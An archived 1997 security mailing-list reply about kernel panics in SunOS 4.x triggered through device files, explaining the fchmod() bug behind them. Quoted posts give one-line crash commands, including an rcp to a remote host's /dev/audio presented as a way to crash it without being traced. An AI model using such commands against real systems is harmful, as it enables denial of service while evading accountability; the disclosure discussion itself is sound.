Re: Fun with devices [was: Re: /dev/tcx0 crashes SunOS 4.1.4 on Sparc

Roger Espel Llima (espel@LLAIC.UNIV-BPCLERMONT.FR)
Tue, 24 Jun 1997 21:12:58 +0200

Messages sorted by: [ date ][ thread ][ subject ][ author ]
Next message: so1o@INSECURITY.ORG: "Linux imapd remote vunerability."
Previous message: Aleph One: "Sun Security Bulletin #00144"

On Tue, Jun 24, 1997 at 09:40:15AM +0200, Jonas Stahre wrote:
> On Mon, 23 Jun 1997, Tobias Walkowiak wrote:
> > ever tried
> > cp -p /vmunix /dev/audioctl
> > under SunOS 4.1.3? panic, dump and reboot.
>
> Then you will have to login and leave a nice entry in the log. It is
> "better" to
>
> rcp /etc/motd you@some.host:/dev/audio
>
> Panic, dump and reboot. And noone know it was you. (Works with any file,
> if you choose an au-file it will first play the sound and then crash. Lot
> of room for creativeness here.)
>
> Works on SunOS 4.1.4, and probably other versions too. Not on Solaris 5.5
> though.

The internal bug here is that fchmod() on /dev/audio (or /dev/audioctl,
or /dev/fb) crashes the kernel.

There's also "echo blah > /dev/tcp".

Like someone said, it's probably not worth repeating these
crash-sunos4-with-a-device exploits again and again, they're fairly well
known by now.

Roger

--
e-mail: espel@llaic.univ-bpclermont.fr, espel@unix.bigots.org
WWW page & PGP key: http://www.eleves.ens.fr:8080/home/espel/index.html

Next message: so1o@INSECURITY.ORG: "Linux imapd remote vunerability."
Previous message: Aleph One: "Sun Security Bulletin #00144"